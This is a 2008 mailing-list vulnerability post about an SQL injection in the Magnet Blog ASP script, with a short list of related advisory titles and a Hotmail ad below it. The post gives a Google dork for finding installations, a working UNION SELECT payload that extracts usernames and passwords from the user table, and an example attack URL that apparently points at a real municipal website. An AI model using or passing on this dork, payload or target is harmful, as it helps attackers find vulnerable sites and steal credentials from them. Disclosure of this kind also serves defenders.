Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

e107 <= 0.7.11 Arbitrary Variable Overwriting

[DSECRG-08-035] Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3

Vulnerabilities in Contact Form ][ for WordPress

From:	Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:	08.08.2008
Subject:	Magnet Blog Sql Injection Vulnerability

# Title:Magnet Blog Sql Injection Vulnerability

# Discovered by : Alemin_Krali  

# Dork: "intitle:Magnet Blog"

# Download:www.aspindir.com/Goster/4217

# Exploit:Http://www.site.com/scriptpath/yazi_detay.asp?id=-999 union select

0,user,2,pass,4,5 from user

#Example:

http://www.degirmenayvali.bel.tr/www.bel.trx/magnet_blog/www/yazi_detay.asp?id=1%
20union

%20select%200,user,2,pass,4,5%20from%20user


# alemin@windowslive.com


# a bugs life!

_________________________________________________________________
Gelen kutunuzda hiç yer kalmamasından bıktınız mı? Windows Live Hotmail şimdi size 5GB
ÜCRETSİZ depolama alanı sunuyor! Ücretsiz Windows Live Hotmail hesabınızı buradan alın!
http://get.live.com/mail/overview